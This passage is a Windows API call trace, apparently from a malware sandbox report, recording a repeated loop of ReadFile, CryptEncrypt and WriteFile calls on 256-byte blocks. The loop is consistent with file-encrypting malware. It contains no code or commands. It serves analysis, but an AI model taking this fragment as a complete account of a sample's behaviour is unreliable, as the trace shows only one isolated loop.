GetLastError () returned 0x0 [0153.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.438] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.438] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.438] GetLastError () returned 0x0 [0153.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.438] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.439] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.439] GetLastError () returned 0x0 [0153.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.439] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.439] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.439] GetLastError () returned 0x0 [0153.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.439] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.439] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.439] GetLastError () returned 0x0 [0153.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.439] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.439] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.439] GetLastError () returned 0x0 [0153.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.439] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.439] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.439] GetLastError () returned 0x0 [0153.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.439] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.439] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.439] GetLastError () returned 0x0 [0153.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.439] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.440] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.440] GetLastError () returned 0x0 [0153.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.440] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.440] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.440] GetLastError () returned 0x0 [0153.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.440] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.440] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.440] GetLastError () returned 0x0 [0153.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.440] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.440] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.440] GetLastError () returned 0x0 [0153.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.440] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.440] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.440] GetLastError () returned 0x0 [0153.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.440] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.440] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.440] GetLastError () returned 0x0 [0153.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.440] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.440] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.440] GetLastError () returned 0x0 [0153.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.441] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.441] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.441] GetLastError () returned 0x0 [0153.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.441] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.441] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.441] GetLastError () returned 0x0 [0153.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.441] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.441] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.441] GetLastError () returned 0x0 [0153.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.441] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.441] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.441] GetLastError () returned 0x0 [0153.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.441] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.441] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.441] GetLastError () returned 0x0 [0153.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.441] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.441] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.441] GetLastError () returned 0x0 [0153.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.441] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.442] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.442] GetLastError () returned 0x0 [0153.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.442] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.442] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.442] GetLastError () returned 0x0 [0153.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.442] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.442] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.442] GetLastError () returned 0x0 [0153.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.442] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.442] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.442] GetLastError () returned 0x0 [0153.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.442] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.442] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.442] GetLastError () returned 0x0 [0153.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.442] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.442] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.442] GetLastError () returned 0x0 [0153.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.442] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.443] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.443] GetLastError () returned 0x0 [0153.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.443] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.443] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.443] GetLastError () returned 0x0 [0153.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.443] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.443] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.443] GetLastError () returned 0x0 [0153.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.443] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.443] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.443] GetLastError () returned 0x0 [0153.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.443] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.443] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.443] GetLastError () returned 0x0 [0153.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.443] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.443] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.443] GetLastError () returned 0x0 [0153.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: 